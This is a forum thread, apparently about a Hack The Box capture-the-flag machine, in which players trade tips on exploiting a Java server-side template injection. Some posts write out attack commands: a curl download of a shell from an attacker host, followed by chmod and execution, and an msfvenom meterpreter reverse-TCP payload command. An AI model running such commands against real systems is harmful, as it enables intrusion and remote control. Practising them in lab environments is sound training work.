Posts: 8 Threads: 0 Joined: N/A Stuck on the ssti bit. Was able to find injection almost immediately then found the sweet generator in this thread that handles encoding.
My issue is I can't get a reverse shell no matter what I try. I'm able to encode a ping and catch it in my tcpdump but my nc listener gets no forwarded shell.
How are folks getting callbacks?
Are folks really just reading that app file that has hardcoded creds? If so how did y'all find that? Posts: 213 Threads: 0 Joined: N/A (July 11, 2022, 05:23 PM)RF0vmM9n87Go Wrote: Stuck on the ssti bit. Was able to find injection almost immediately then found the sweet generator in this thread that handles encoding.
My issue is I can't get a reverse shell no matter what I try. I'm able to encode a ping and catch it in my tcpdump but my nc listener gets no forwarded shell.
How are folks getting callbacks?
Are folks really just reading that app file that has hardcoded creds? If so how did y'all find that? At first, I tried using a Bash one-liner from here: https://www.revshells.com/. However, I didn't get a callback either. Not sure why. So I created a reverse shell using msfvenom and then I ran these three commands via the SSTI exploit: curl http://10.10.14.xxx/shell -o /tmp/shell chmod u+x /tmp/shell /tmp/shell Posts: 213 Threads: 0 Joined: N/A How did you guys find this SSTI vulnerability?
I ran an active scan with Burp Suite Professional against the search form, but it did not detect this SSTI.
Which web application vulnerablity scanner do you use? Posts: 22 Threads: 0 Joined: N/A  (July 12, 2022, 09:06 AM)Exa Wrote: How did you guys find this SSTI vulnerability?
I ran an active scan with Burp Suite Professional against the search form, but it did not detect this SSTI.
Which web application vulnerablity scanner do you use? Hey I also use Burp Professional, I found the STTI pretty much right away, it didn't mark it as SSTI but it did say that there was template manipulation because of some math it tried (50*50) for example. From there I realized it was Java SSTI because of the framework that the site uses from looking at the source code. Posts: 59 Threads: 0 Joined: N/A (July 12, 2022, 09:06 AM)Exa Wrote: How did you guys find this SSTI vulnerability?
I ran an active scan with Burp Suite Professional against the search form, but it did not detect this SSTI.
Which web application vulnerablity scanner do you use? i mostly use ZAP -> https://www.zaproxy.org/ you could run it in aggressive detection mode. enough for boxes which encourage ethical hacking. + lots of plugins. Posts: 6 Threads: 0 Joined: N/A (July 11, 2022, 08:39 PM)Exa Wrote: (July 11, 2022, 05:23 PM)RF0vmM9n87Go Wrote: Stuck on the ssti bit. Was able to find injection almost immediately then found the sweet generator in this thread that handles encoding.
My issue is I can't get a reverse shell no matter what I try. I'm able to encode a ping and catch it in my tcpdump but my nc listener gets no forwarded shell.
How are folks getting callbacks?
Are folks really just reading that app file that has hardcoded creds? If so how did y'all find that?
At first, I tried using a Bash one-liner from here: https://www.revshells.com/. However, I didn't get a callback either. Not sure why.
So I created a reverse shell using msfvenom and then I ran these three commands via the SSTI exploit:
curl http://10.10.14.xxx/shell -o /tmp/shell
chmod u+x /tmp/shell
/tmp/shell I can get a reverse shell with an msfvenom elf file, both to a listening netcat or Meterpreter handler, but as soon as I enter a command on either the connection drops immediately. Did you find the same? Posts: 213 Threads: 0 Joined: N/A July 13, 2022 at 10:56 PM (July 13, 2022, 09:09 PM)u01dr22 Wrote: I can get a reverse shell with an msfvenom elf file, both to a listening netcat or Meterpreter handler, but as soon as I enter a command on either the connection drops immediately. Did you find the same? I had no such issues. I was using msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf Posts: 213 Threads: 0 Joined: N/A (July 14, 2022, 01:30 AM)phuongvy29 Wrote: (July 13, 2022, 10:56 PM)Exa Wrote: (July 13, 2022, 09:09 PM)u01dr22 Wrote: I can get a reverse shell with an msfvenom elf file, both to a listening netcat or Meterpreter handler, but as soon as I enter a command on either the connection drops immediately. Did you find the same?
I had no such issues. I was using msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf
I stuck with chmod. when get the file from local. It own of woodenk but group is logs and can not add +x
Update: use ssti-payload to generate payload for chmod u+x , and now ok got shell I was confused too that chmod u+x wasn't working. chmod 700 worked though. Posts: 12 Threads: 0 Joined: N/A (July 9, 2022, 09:42 PM)mceye Wrote: cat /opt/panda_search/src/main/java/com/panda_search/htb/panda_search/MainController.java Do you believe that is the solution path HTB had in mind? Posts: 6 Threads: 0 Joined: N/A (July 13, 2022, 10:56 PM)Exa Wrote: (July 13, 2022, 09:09 PM)u01dr22 Wrote: I can get a reverse shell with an msfvenom elf file, both to a listening netcat or Meterpreter handler, but as soon as I enter a command on either the connection drops immediately. Did you find the same?
I had no such issues. I was using msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf Got it working in Metasploit, my handler was set to default generic, changing it to match the payload kept it stable, cheers. |
